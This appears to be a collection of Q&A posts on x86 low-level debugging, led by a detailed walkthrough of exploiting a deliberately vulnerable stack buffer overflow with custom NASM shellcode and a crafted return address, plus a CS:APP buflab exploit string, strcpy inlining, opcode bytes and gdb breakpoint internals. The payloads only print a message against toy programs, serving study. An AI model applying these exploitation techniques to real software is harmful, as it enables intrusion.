I am studying the stack-based buffer overflow vulnerability. I would like to inject the following shellcode I wrote:
BITS 64
jmp short one
two:
pop rcx
xor rax,rax
mov al, 4
xor rbx, rbx
inc rbx
xor rdx, rdx
mov dl, 15
int 0x80
mov al, 1
dec rbx
int 0x80
one:
call two
db "Hello, Friend.\n", 0x0a
I disabled ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) and compiled the program using -fno-stack-protector -z execstack, but still when I run the command:
root@computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')
this is what I get:
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault
The offset (64) was calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian encoding of 0x7fffffffe76b, the address of the environment variable that holds the shellcode.
I also hexdumped the injected program, making sure no null bytes were present:
00000000 eb 1a 59 48 31 c0 b0 04 48 31 db 48 ff c3 48 31 |..YH1...H1.H..H1|
00000010 d2 b2 0f cd 80 b0 01 48 ff cb cd 80 e8 e1 ff ff |.......H........|
00000020 ff 48 65 6c 6c 6f 2c 20 46 72 69 65 6e 64 2e 5c |.Hello, Friend.\|
00000030 6e 0a |n.|
00000032
The address was calculated using:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int pl = strlen(*argv);
char *addr = getenv(*++argv);
addr += (pl - strlen(*++argv))*2;
printf("\n%s # %p\n\n", *--argv, addr);
}
A changed version of the program in Jon Erickson's book.
This is the program with the vulnerability:
//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void hidden(void){
printf("Welcome to the dark side, young padawan");
exit(0);
}
void welcome(char *s){
char buffer[50];
//int placeholder = 13;
strcpy(buffer, "Welcome ");
strcat(buffer, s);
printf("%s\n", buffer);
}
int main(int argc, char **argv){
if(--argc < 1){
printf("\nUsage: %s [NAME]\n\n", *argv);
exit(1);
}
welcome(*++argv);
}
Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):
(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdda0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddc0: 0x00000000 0x00000000 0xf7ffe180 0x00007fff
0x7fffffffddd0: 0x00000002 0x00000000 0x555551bf 0x00005555
0x7fffffffdde0: 0x00000000 0x00000000 0xffffe2cf 0x00007fff
0x7fffffffddf0: 0x636c6557 0x20656d6f 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0xafc394c2 0xc335b8c3
0x7fffffffde40: 0xff007fbc 0x00007fff 0x00000000 0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü
Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16 }
After the padding (0x41), the return address is ruined due to the double byte representation of \xff.
Can someone help me understand why I am not able to inject the shellcode?
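First of all, use the 64-bit system call interface when exploiting a 64-bit executable. int 0x80 is the old 32-bit syscall interface: it uses the 32-bit system call numbers and only the low 32 bits of the argument registers, so a pointer to a stack address such as 0x7fffffffe76b cannot be passed through it. Use the syscall instruction instead.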
Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding.
See below if you still want to use an environment variable.
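A side note on the doubled \xff bytes visible in the GDB dump in the question: python3's print encodes a str for the terminal, so under a UTF-8 locale every character above 0x7f becomes two bytes and the address is corrupted. The following is a minimal sketch of the difference, assuming a UTF-8 locale; the names as_text, as_bytes and write_payload are illustrative and not part of the original post.

```python
import sys

# What print("\x6b\xe7\xff\xff\xff\x7f") emits under a UTF-8 locale:
# each code point above 0x7f is encoded as two bytes.
as_text = "\x6b\xe7\xff\xff\xff\x7f".encode("utf-8")

# What the exploit needs: the six raw bytes of the address.
as_bytes = b"\x6b\xe7\xff\xff\xff\x7f"


def write_payload(stream=None) -> None:
    """Write 64 padding bytes plus the raw address, bypassing text encoding."""
    if stream is None:
        stream = sys.stdout.buffer  # binary stream behind sys.stdout
    stream.write(b"A" * 64 + as_bytes)


print(len(as_text), as_text.hex())    # 10 bytes instead of 6
print(len(as_bytes), as_bytes.hex())
```

Calling write_payload() from a script and passing its output through $(...) delivers the bytes unchanged, whereas print would deliver the 10-byte UTF-8 form.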
Passing the shellcode in the buffer
I won't disable ASLR globally; instead I rely on GDB, which disables ASLR for the debugged process alone by setting its personality.
Since the process reads the string from the command line, this gets a little tricky: Linux saves the environment variables and the command line arguments above the stack, so the bigger they are, the lower the stack pointer will be at the program entry point.
This will change the actual address where the shellcode will be loaded.
So you first need to know how big the shellcode will be, and for that you also need to know how much data is needed to overwrite the return address. You can find this out by inspecting the disassembly of welcome.
For a function as simple as it is, objdump will suffice:
000000000000118b <welcome>:
118b: 55 push %rbp
118c: 48 89 e5 mov %rsp,%rbp
118f: 48 83 ec 50 sub $0x50,%rsp
1193: 48 89 7d b8 mov %rdi,-0x48(%rbp) ;message
1197: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
119b: 48 b9 57 65 6c 63 6f movabs $0x20656d6f636c6557,%rcx ;"Welcome "
11a2: 6d 65 20
11a5: 48 89 08 mov %rcx,(%rax)
11a8: c6 40 08 00 movb $0x0,0x8(%rax)
11ac: 48 8b 55 b8 mov -0x48(%rbp),%rdx ;message
11b0: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
11b4: 48 89 d6 mov %rdx,%rsi
11b7: 48 89 c7 mov %rax,%rdi
11ba: e8 91 fe ff ff call 1050 <strcat@plt> ;<--
11bf: 48 8d 45 c0 lea -0x40(%rbp),%rax
11c3: 48 89 c7 mov %rax,%rdi
11c6: e8 65 fe ff ff call 1030 <puts@plt>
11cb: 90 nop
11cc: c9 leave
11cd: c3 ret
You can see from my comment that the string buffer is at rbp-0x40.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome ", since this is a strcat, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.
Create a file with 72 bytes:
> python -c 'print("A"*72, end="")' > shellcode
Now use this file and GDB to find out the address of buffer:
> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13 strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0
We now know that buffer is at 0x7fffffffe2d0, so:
The shellcode will be 8 bytes into buffer: 0x7fffffffe2d8
The return address will be 64 bytes into the shellcode (due to the consideration above).
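The arithmetic behind these numbers can be written out as a short sketch. The constants are taken from the disassembly and the GDB session above; the variable names are only illustrative.

```python
# Values read from the disassembly of welcome and from 'p &buffer'.
BUFFER_OFFSET = 0x40          # buffer lives at rbp-0x40
SAVED_RBP = 8                 # saved frame pointer sits right above the locals
RET_ADDR = 8                  # size of the return address itself
PREFIX = len("Welcome ")      # strcpy writes this before strcat appends
BUFFER_ADDR = 0x7fffffffe2d0  # address of buffer reported by GDB

# Bytes of the argument needed to cover everything up to and including
# the return address.
payload_len = BUFFER_OFFSET + SAVED_RBP + RET_ADDR - PREFIX

# strcat appends the argument right after "Welcome ".
shellcode_addr = BUFFER_ADDR + PREFIX

# Offset of the return address, measured from the start of the argument.
ret_offset = payload_len - RET_ADDR

print(payload_len, hex(shellcode_addr), ret_offset)
```

This prints 72, 0x7fffffffe2d8 and 64, matching the figures used in this section.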
It's time to write a shellcode and test it.
Since we are passing it on the command line, it must not contain newlines either. However, printing a newline is useful to flush the current line to stdout, so I used an ugly hack that creates the newline at the end of the string at runtime.
The ugly shellcode is:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0 ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!A" ;Last char is replaced with a new line
.len EQU $-message
Now assemble this:
> nasm shellcode.asm -o shellcode
Then pad the file to 64 bytes and append the return address found above:
0000:0000 | 6A 01 58 6A 01 5F 48 8D 35 1C 01 01 01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01 C6 46 06 AA 80 76 06 A0 6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58 31 FF 0F 05 48 65 6C 6C 6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF FF 7F 00 00 | Øâÿÿÿ...
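The padding step can be scripted instead of done in a hex editor. This is a minimal sketch, not the method used to produce the dump above: build_payload is a hypothetical helper, and the 64-byte offset and the address 0x7fffffffe2d8 are the values derived earlier in this answer.

```python
import struct


def build_payload(code: bytes, ret_addr: int, ret_offset: int = 64,
                  pad: bytes = b"A") -> bytes:
    """Pad `code` to `ret_offset` bytes and append the 8-byte address."""
    if len(code) > ret_offset:
        raise ValueError("shellcode does not fit before the return address")
    body = code + pad * (ret_offset - len(code))
    # Zero bytes and newlines would not survive the trip through argv.
    if b"\x00" in body or b"\n" in body:
        raise ValueError("payload contains a zero byte or a newline")
    # Little-endian 64-bit address, as in the last row of the hexdump.
    return body + struct.pack("<Q", ret_addr)


# Example with the first six bytes of the assembled shellcode.
payload = build_payload(bytes.fromhex("6a01586a015f"), 0x7fffffffe2d8)
print(len(payload), payload[64:].hex())
```

The file stores all 8 address bytes, but a command line argument cannot carry the two trailing zero bytes. That is harmless here, because the corresponding bytes of the saved return address are already zero for the user-space addresses shown in this post.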
The stack is aligned on 16 bytes so as long as your shellcode length is between 0x40 and 0x4f (ends included) the shellcode address won't change.
Finally, run the shellcode:
> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]
Passing the shellcode in an envar
I assume you read the section above.
The address of the envar depends both on its size and the size of the command line argument.
The command line argument must be at least 64 + 6 bytes long (6 rather than 8 because the two most significant bytes of the return address are zero), and the shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar changes with every single byte of shellcode size, but it changes only in 16-byte steps with the size of the command line argument (this quantity was once called a paragraph), because the stack is aligned to 16 bytes.
Write a 70-bytes file with a recognizable pattern, like:
0000:0000 | 43 41 4E 41 52 59 41 41 41 41 41 41 41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it pattern. This will simulate the shellcode, and it needs a few distinct bytes we can search for.
Create another 70-bytes file with another pattern:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it placeholder. This will simulate the command line argument.
Find where the envar is with gdb.
Remember that we need to pass 70 bytes as the command line argument to simulate the condition under which the program will be run.
The file placeholder will be used for this purpose, and the file pattern will be used to search for its first bytes in memory.
> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19 if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f
Now edit placeholder and put the address found in its last 6 bytes:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF FF 7F | .ìÿÿÿ.
This is the final value of the command line argument.
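Editing the last 6 bytes can also be done with a few lines of Python. This is a sketch under the assumptions of this section (a 70-byte argument and the address 0x7fffffffec1f found by GDB); patch_return_address is a hypothetical helper name.

```python
import struct


def patch_return_address(arg: bytes, addr: int) -> bytes:
    """Replace the last 6 bytes of `arg` with the low 6 bytes of `addr`."""
    packed = struct.pack("<Q", addr)          # 8 bytes, little-endian
    if packed[6:] != b"\x00\x00":
        raise ValueError("address does not fit in 6 bytes")
    low = packed[:6]
    if b"\x00" in low:
        raise ValueError("address contains a zero byte")
    return arg[:-6] + low


placeholder = b"A" * 70
final_arg = patch_return_address(placeholder, 0x7fffffffec1f)
print(final_arg[-6:].hex())
```

Six bytes are enough because strcat writes its own terminating zero after them, and the two upper bytes of the original return address (0x00005555555551bf in the question's dump) are already zero.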
Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!", 0x0a ;The message now ends with a real new line
.len EQU $-message
TIMES 70 -($-$$) db 'A'
Assemble it:
> nasm shellcode.asm -o shellcode
We can now run it:
> SC=$(cat shellcode) gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]
How does it work?
Our strategy has been to use GDB to replicate the runtime conditions under which the program will be exploited.
In the first section we wanted the address of buffer. Since it depends on the size of the command line arguments, we first worked out the shellcode size by statically analyzing the program and then found the address of buffer using a fake shellcode.
The exploitation itself is pretty basic: the stack is executable and the return address is simply overwritten to steer the execution.
In the second section we wanted the address of an envar value, which the kernel places above the stack.
We proceeded in the same manner: we used a fake command line argument, a fake shellcode with a recognizable pattern, and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one but the shellcode is inside an envar (which allows for newlines and whatnot).
So, I have the following c program:
#include <stdio.h>
#include <string.h>
int main(){
char arr[20];
//this is line 6
strcpy(arr,"Hello, world!\n");
printf(arr);
}
I compiled it using the following command:
gcc -g t2.c -o a2.out
After that I loaded it in gdb and tried setting breakpoints at line 6, at the strcpy function and at line 8. Sure enough, when setting the breakpoint at strcpy I got the following message : "Make breakpoint pending on future shared library load? (y or [n])". I answered "y" and got "Breakpoint 2 (strcpy) pending.".
After answering yes, and running through the program, Breakpoint 2 is never resolved, and the debugger jumps straight to Breakpoint 3 at printf.
I am using Intel syntax in my debugger. Other than that no custom settings. Can anyone tell why the Breakpoint at strcpy is never resolved?
Compilers such as gcc are deeply familiar with the semantics of string functions such as strcpy.
On x86-64 with your example, gcc 9 emits inline stores rather than a strcpy call, even at -O0. The breakpoint should work for most other functions.
x86-64 disassembly generated with gcc-9 (no strcpy call):
0000000000000000 <main>:
0: 48 83 ec 28 sub rsp,0x28
4: 48 b8 48 65 6c 6c 6f 2c 20 77 movabs rax,0x77202c6f6c6c6548
e: bf 01 00 00 00 mov edi,0x1
13: 48 89 04 24 mov QWORD PTR [rsp],rax
17: b8 21 0a 00 00 mov eax,0xa21
1c: 48 89 e6 mov rsi,rsp
1f: 66 89 44 24 0c mov WORD PTR [rsp+0xc],ax
24: 31 c0 xor eax,eax
26: c7 44 24 08 6f 72 6c 64 mov DWORD PTR [rsp+0x8],0x646c726f
2e: c6 44 24 0e 00 mov BYTE PTR [rsp+0xe],0x0
33: e8 00 00 00 00 call 38 <main+0x38>
34: R_X86_64_PLT32 __printf_chk-0x4
38: 31 c0 xor eax,eax
3a: 48 83 c4 28 add rsp,0x28
3e: c3 ret
I'm trying to understand how assembly relates to C code.
I have the following C program, compiled to an object file only.
#include <stdio.h>
int main()
{
int i = 10;
int j = 22 + i;
return 0;
}
I executed the following command:
objdump -S myprogram.o
The output of the above command is:
objdump -S testelf.o
testelf.o: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
#include <stdio.h>
int main()
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 83 ec 10 sub $0x10,%esp
int i = 10;
6: c7 45 f8 0a 00 00 00 movl $0xa,-0x8(%ebp)
int j = 22 + i;
d: 8b 45 f8 mov -0x8(%ebp),%eax
10: 83 c0 16 add $0x16,%eax
13: 89 45 fc mov %eax,-0x4(%ebp)
return 0;
16: b8 00 00 00 00 mov $0x0,%eax
}
1b: c9 leave
1c: c3 ret
What do the numbers before the mnemonics mean,
i.e. "83 ec 10" before the "sub" instruction or
"c7 45 f8 0a 00 00 00" before the "movl" instruction?
I'm using the following platform to compile this code:
$ lscpu
Architecture: i686
CPU op-mode(s): 32-bit
Byte Order: Little Endian
CPU(s): 1
On-line CPU(s) list: 0
Thread(s) per core: 1
Core(s) per socket: 1
Socket(s): 1
Vendor ID: GenuineIntel
Those are the x86 machine code bytes (opcodes and their operands). A detailed reference, other than the ones listed in the comments above, is available here.
For example, the c7 45 f8 0a 00 00 00 before movl $0xa,-0x8(%ebp) is the hexadecimal encoding of that instruction. It tells the CPU to move the immediate value 10 decimal (as a 4-byte value) to the stack location 8 bytes below the address held in the frame base pointer (ebp - 8). That is where the variable i from your C source code lives while your code is running. The top of the stack is at a lower memory address than the bottom of the stack, so a negative offset from the base moves toward the top of the stack.
In c7 45 f8, c7 is the opcode for a mov of an immediate value to a register or memory operand, 45 is the ModRM byte selecting a memory operand addressed as ebp plus an 8-bit displacement, and f8 is that displacement (-8 as a signed byte). mov does not modify any flag in the EFLAGS register. See the reference for more detail.
The remaining bytes are the immediate value. Since you are using a little-endian system, the least significant byte of a number is listed first, so 10 decimal, which is 0x0a in hexadecimal and 0x0000000a as a 4-byte value, is stored as 0a 00 00 00.
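To make the byte layout concrete, here is a small sketch that splits the seven bytes of movl $0xa,-0x8(%ebp) into their fields. It handles only this one encoding shape (opcode, ModRM, 8-bit displacement, 32-bit immediate) and is not a general disassembler; the variable names are illustrative.

```python
import struct

raw = bytes.fromhex("c7 45 f8 0a 00 00 00")

opcode = raw[0]                          # 0xc7: mov immediate to r/m
modrm = raw[1]                           # 0x45
mod = modrm >> 6                         # 1 -> memory operand with 8-bit displacement
reg = (modrm >> 3) & 0b111               # 0 -> opcode extension /0
rm = modrm & 0b111                       # 5 -> base register ebp
(disp,) = struct.unpack("<b", raw[2:3])  # signed 8-bit displacement
(imm,) = struct.unpack("<i", raw[3:7])   # little-endian 32-bit immediate

print(hex(opcode), mod, reg, rm, disp, imm)
```

The displacement decodes to -8 and the immediate to 10, which is exactly the -0x8(%ebp) and $0xa shown by objdump.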
I'm doing the csapp buflab level 2. In this assignment I'm asked to supply an exploit string through getbuf(). My getbuf() looks like this:
08048fe0 <getbuf>:
8048fe0: 55 push %ebp
8048fe1: 89 e5 mov %esp,%ebp
8048fe3: 83 ec 18 sub $0x18,%esp
8048fe6: 8d 45 f4 lea -0xc(%ebp),%eax
8048fe9: 89 04 24 mov %eax,(%esp)
8048fec: e8 6f fe ff ff call 8048e60 <Gets>
8048ff1: b8 01 00 00 00 mov $0x1,%eax
8048ff6: c9 leave
8048ff7: c3 ret
8048ff8: 90 nop
8048ff9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
And the bang() checks the global_value,
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
So I find the address:
0804a1dc <global_value>:
804a1dc: 00 00 00 00
And my exploit string looks like:
00000000 <.text>:
0: c7 05 dc a1 04 08 6c movl $0x6355476c,0x804a1dc
7: 47 55 63
a: 68 60 8d 04 08 push $0x8048d60
f: c3 ret
Then I looked up the address of the input string (it should be on the stack):
Breakpoint 1, 0x08048fe6 in getbuf ()
(gdb) print /x ($ebp-0xc)
$1 = 0xffffb3ac
(gdb)
So my input string is c7 05 dc a1 04 08 6c 47 55 63 68 60 8d 04 08 c3 ac b3 ff ff
However, I still get a segmentation fault. The output below shows that I entered the right address, and I successfully passed levels 0 and 1 using the same strategy, so I don't understand what I did wrong.
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < fire_hex_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < fire_hex_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0xa1dc05c7
0xffffb3b0: 0x476c0804 0x60686355 0xc308048d 0xffffb3ac
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xffffb3ac in ?? ()
(gdb)
This is the successful run of level 0 (where I was asked to simply overwrite the return address with another function's starting address). Notice that the addresses are in the same place, but level 2 just failed.
Reading symbols from bufbomb...done.
(gdb) break *getbuf+17
Breakpoint 1 at 0x8048ff1
(gdb) run -t PB12000359 < smoke_raw
Starting program: /home/xgwang/Workspace/csapp_exp/Lab3 [buf Lab]/workspace/bufbomb -t PB12000359 < smoke_raw
Team: PB12000359
Cookie: 0x6355476c
Breakpoint 1, 0x08048ff1 in getbuf ()
(gdb) x/10x $esp
0xffffb3a0: 0xffffb3ac 0x555ac728 0x555e819b 0x00000000
0xffffb3b0: 0x00000000 0x00000000 0x00000000 0x08048e20
0xffffb3c0: 0x00000000 0x08049ac7
(gdb) cont
Continuing.
Type string:Smoke!: You called smoke()
Thanks for any advice.
Here is a short program; the code is as follows:
/* init.c */
#include <syscall.h>
#include <stdio.h>
int main()
{
int pid, exitstatus;
char shell[] = "shell";
char * args[] = {shell, 0};
while(1) {
pid = fork();
if (!pid)
exec(shell, args);
while (pid != wait(&exitstatus));
printf("Shell exited with status %d; starting it back up...", exitstatus);
}
}
compiled using gcc:
gcc -nostdinc -fno-strict-aliasing -fno-builtin -Wall -gstabs -Werror -O0 -m32 -c -o init.o init.c
using objdump to check the gstabs information of variable pid:
objdump -G init.o | grep pid
and the output of objdump:
37 LSYM 0 0 00000018 777 pid:(0,1)
When I try to print the memory address of pid within gdb:
print &pid
the result shows that &pid == $ebp + 0x18, but the assembly code actually operates on the address $esp + 0x18, as the disassembly below shows.
Part of the disassembly of init.o:
20 2c: c7 44 24 20 00 00 00 movl $0x0,0x20(%esp)
21 33: 00
22 34: e8 fc ff ff ff call 35 <main+0x35>
23 39: 89 44 24 18 mov %eax,0x18(%esp)
24 3d: 83 7c 24 18 00 cmpl $0x0,0x18(%esp)
25 42: 75 16 jne 5a <main+0x5a>
26 44: 8d 44 24 1c lea 0x1c(%esp),%eax
27 48: 89 44 24 04 mov %eax,0x4(%esp)
28 4c: 8d 44 24 26 lea 0x26(%esp),%eax
here at line 23:
mov %eax,0x18(%esp)
I think this instruction stores the result of fork() in the variable pid, and it uses the address $esp + 0x18, not $ebp + 0x18 as gdb shows. As a result, I cannot get the expected value when I execute print pid in gdb (the same goes for the other local variables). So, how could this happen?
I am learning some anti-debugging techniques on Linux and found a snippet of code for checking 0xcc byte in memory to detect the breakpoints in gdb. Here is that code:
if ((*(volatile unsigned *)((unsigned)foo + 3) & 0xff) == 0xcc)
{
printf("BREAKPOINT\n");
exit(1);
}
foo();
But it does not work. I even tried to set a breakpoint on foo() function and observe the contents in memory, but did not see any 0xcc byte written for breakpoint. Here is what I did:
(gdb) b foo
Breakpoint 1 at 0x804846a: file p4.c, line 8.
(gdb) x/x 0x804846a
0x804846a <foo+6>: 0xe02404c7
(gdb) x/16x 0x8048460
0x8048460 <frame_dummy+32>: 0x90c3c9d0 0x83e58955 0x04c718ec 0x0485e024
0x8048470 <foo+12>: 0xfefae808 0xc3c9ffff .....
As you can see, there seems to be no 0xcc byte written on the entry point of foo() function. Does anyone know what's going on or where I might be wrong? Thanks.
Second part is easily explained (as Flortify correctly stated):
GDB shows the original memory contents, not the breakpoint bytes. In its default mode it even removes the breakpoints when the program is stopped and re-inserts them before continuing. Users typically want to see their code, not the strange modified instructions used for breakpoints.
With your C code you missed the breakpoint by a few bytes. GDB sets the breakpoint after the function prologue, because the prologue is not typically what gdb users want to see. So if you put a break on foo, the actual breakpoint will typically be located a few bytes after its start (how many depends on the prologue code, which differs per function: it may or may not have to save the stack pointer, frame pointer and so on). But it is easy to check. I used this code:
#include <stdio.h>
int main()
{
int i,j;
unsigned char *p = (unsigned char*)main;
for (j=0; j<4; j++) {
printf("%p: ",p);
for (i=0; i<16; i++)
printf("%.2x ", *p++);
printf("\n");
}
return 0;
}
If we run this program by itself it prints:
0x40057d: 55 48 89 e5 48 83 ec 10 48 c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
Now we run it in gdb (output re-formatted for SO).
(gdb) break main
Breakpoint 1 at 0x400585: file ../bp.c, line 6.
(gdb) info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x0000000000400585 in main at ../bp.c:6
(gdb) disas/r main,+32
Dump of assembler code from 0x40057d to 0x40059d:
0x000000000040057d (main+0): 55 push %rbp
0x000000000040057e (main+1): 48 89 e5 mov %rsp,%rbp
0x0000000000400581 (main+4): 48 83 ec 10 sub $0x10,%rsp
0x0000000000400585 (main+8): 48 c7 45 f8 7d 05 40 00 movq $0x40057d,-0x8(%rbp)
0x000000000040058d (main+16): c7 45 f4 00 00 00 00 movl $0x0,-0xc(%rbp)
0x0000000000400594 (main+23): eb 5a jmp 0x4005f0
0x0000000000400596 (main+25): 48 8b 45 f8 mov -0x8(%rbp),%rax
0x000000000040059a (main+29): 48 89 c6 mov %rax,%rsi
End of assembler dump.
With this we verified that the program prints the correct bytes. It also shows that the breakpoint was inserted at 0x400585 (that is, after the function prologue), not at the first instruction of the function.
If we now run the program under gdb (with run) and then "continue" after the breakpoint is hit, we get this output:
(gdb) cont
Continuing.
0x40057d: 55 48 89 e5 48 83 ec 10 cc c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
This now shows 0xcc at offset 8 into main (address 0x400585, the ninth byte), exactly where the breakpoint was set.
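The changed byte is easy to miss by eye, so here is a small sketch that compares the first line of the two dumps above. The helper parse_dump_line is hypothetical; the input strings are copied from the standalone run and the run under gdb.

```python
def parse_dump_line(line: str) -> bytes:
    """Turn '0x40057d: 55 48 ...' into the raw bytes after the colon."""
    _, _, hex_part = line.partition(":")
    return bytes.fromhex(hex_part)


standalone = parse_dump_line(
    "0x40057d: 55 48 89 e5 48 83 ec 10 48 c7 45 f8 7d 05 40 00")
under_gdb = parse_dump_line(
    "0x40057d: 55 48 89 e5 48 83 ec 10 cc c7 45 f8 7d 05 40 00")

# Collect (offset, original byte, byte seen under gdb) for every difference.
diffs = [(off, a, b)
         for off, (a, b) in enumerate(zip(standalone, under_gdb))
         if a != b]

for off, a, b in diffs:
    print(f"main+{off}: {a:#04x} -> {b:#04x}")
```

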